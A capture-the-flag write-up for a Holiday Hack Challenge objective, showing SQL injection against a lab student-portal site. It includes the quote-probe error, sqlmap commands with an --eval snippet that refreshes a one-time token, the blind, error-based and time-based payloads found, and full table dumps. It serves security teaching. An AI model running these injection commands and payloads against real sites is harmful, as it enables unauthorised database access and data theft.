9. Retrieve Scraps of Paper from Server¶

Difficulty: 🎄🎄🎄🎄

obj9-1

📜 Info & Hints¶

Retrieve Scraps of Paper from Server

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.
What is the name of Santa's cutting-edge sleigh guidance system?

For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

🧝🏻‍♂️ Pepper Minstix

That's it - hooray!

Have you had any luck retrieving scraps of paper from the Elf U server?

You might want to look into SQL injection techniques.

OWASP is always a good resource for web attacks.

For blind SQLi, I've heard Sqlmap is a great tool.

In certain circumstances though, you need custom tamper scripts to get things going!

SQL Injection

SQL Injection from OWASP

SQLMap Tamper Scripts

Sqlmap Tamper Scripts

What is the name of Santa's cutting-edge sleigh guidance system?

⚡️ Solution¶

Understand the backend:¶

When you visit the student portal, you will find two forms one for submitting an application and other for query the application status :

obj9-2

Let's go with (Check Application Status](https://studentportal.elfu.org/check.php) page to check the database:

obj9-3

The form send Get request to https://studentportal.elfu.org/application-check.php with the email and token:

obj9-4

If we checked the check.php page source code we can see that the token is hidden value in the form and filled by javascript getting data from validator.php

<input type="hidden" id="token" name="token" value=""/>

function submitApplication() {
 console.log("Submitting");
 elfSign();
 document.getElementById("check").submit();
}
function elfSign() {
 var s = document.getElementById("token");

 const Http = new XMLHttpRequest();
 const url='/validator.php';
 Http.open("GET", url, false);
 Http.send(null);

 if (Http.status === 200) {
   console.log(Http.responseText);
   s.value = Http.responseText;
 }

}

Visit validator.php and try to refesh for 3-4 times. Each visit you will get new token which indicate it's time based token/one time use token.

MTAxMDMyNTA4NTQ0MTU3ODYzMjk0NjEwMTAzMjUwOC41NDQ=_MTI5MzIxNjEwOTM2MzIzMjMzMDQwMjczLjQwOA==

MTAxMDMyNTA3NjQ4MTU3ODYzMjkzMjEwMTAzMjUwNy42NDg=_MTI5MzIxNjA5Nzg5NDQzMjMzMDQwMjQ0LjczNg==

MTAxMDMyNTA3OTY4MTU3ODYzMjkzNzEwMTAzMjUwNy45Njg=_MTI5MzIxNjEwMTk5MDQzMjMzMDQwMjU0Ljk3Ng==

SQL Injection¶

Let's try to inject the query to compromise the database:

send ' as an email input to check the error we are getting from the database.

obj9-5

ERROR

Error: SELECT status FROM applications WHERE elfmail = ''';

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1

We get valuable information: application table , MariaDB database dbms.

Let's use Sqlmap tool to automate the injection and retrive the data.

Download the tool link or using git command.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

We need to get the token, so we will use small python code with --eval option in sqlmap

the script will make a GET request to validator.php retrieve the token and store it in a variable token to be used by sqlmap
```
import requests

r = requests.get('https://studentportal.elfu.org/validator.php')

token = r.text;
```
You will need to insall requests package:
```
pip3 install requests
```

sqlmap commands :

Let's start by testing the databases for injection:

python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1"  -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4

-u the page communicating with targeted database.
-p Testable parameter .
--dbms=MariaDB set dbms type.
--eval=EVALCODE Evaluate provided Python code before the request.
-v set the verbosity level of output messages.

00:00-00:00

sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
---
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: elfmail=1' AND 1817=1817 AND 'VsQU'='VsQU&token=1
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=1' AND (SELECT 6257 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6257=6257,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kcsP'='kcsP&token=1
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: elfmail=1' AND (SELECT 2136 FROM (SELECT(SLEEP(5)))DMUR) AND 'eZch'='eZch&token=1
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---

Now let's try to get the databases:

python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1"  -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dbs -v 4

--dbs Enumerate DBMS databases

00:00-00:00

available databases [2]:
[*] elfu
[*] information_schema

Get elfu database tables:

python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1"  -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --tables -v 4 -D elfu

--tables Enumerate DBMS database tables
-D DB DBMS database to enumerate

00:00-00:00

Database: elfu
[3 tables]
+--------------+
| applications |
| krampus      |
| students     |
+--------------+

The tables looks interesting. let's focus on students, krampus because applications table will be filled with all testing queries everyone did!

Dumping students & krampus tables:

python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1"  -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4 -D elfu -T "krampus,students" --dump

-T DBMS database table(s) to enumerate
--dump Dump DBMS database table entries

00:00-00:00

Database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path                  |
+----+-----------------------+
| 1  | /krampus/0f5f510e.png |
| 2  | /krampus/1cc7e121.png |
| 3  | /krampus/439f15e6.png |
| 4  | /krampus/667d6896.png |
| 5  | /krampus/adb798ca.png |
| 6  | /krampus/ba417715.png |
+----+-----------------------+

Also the result saved in csv files in folder at home directory .sqlmap/output/studentportal.elfu.org

obj9-6

Alternative method

We can test injection and dump the all tables with one command but it will take longer time:

python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1"  -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dump

Retrieve the paper scraps :¶

Using the data we retrieved from krampus table we now can get all scraps which we know from the objective it's hosted at the student portal

https://studentportal.elfu.org/krampus/0f5f510e.png
https://studentportal.elfu.org/krampus/1cc7e121.png
https://studentportal.elfu.org/krampus/439f15e6.png
https://studentportal.elfu.org/krampus/667d6896.png
https://studentportal.elfu.org/krampus/adb798ca.png
https://studentportal.elfu.org/krampus/ba417715.png

obj9-7

The name of Santa's cutting-edge sleigh guidance system

super sled-o-matic

Congratulations! You have completed the Retrieve Scraps of Paper from Server challenge! 🎉

🎓 What you've learned¶

Using sql injection to get errors that expose information about the database.
Automating Sql injection using sqlmap.
Evaluate python code in sqlmap command.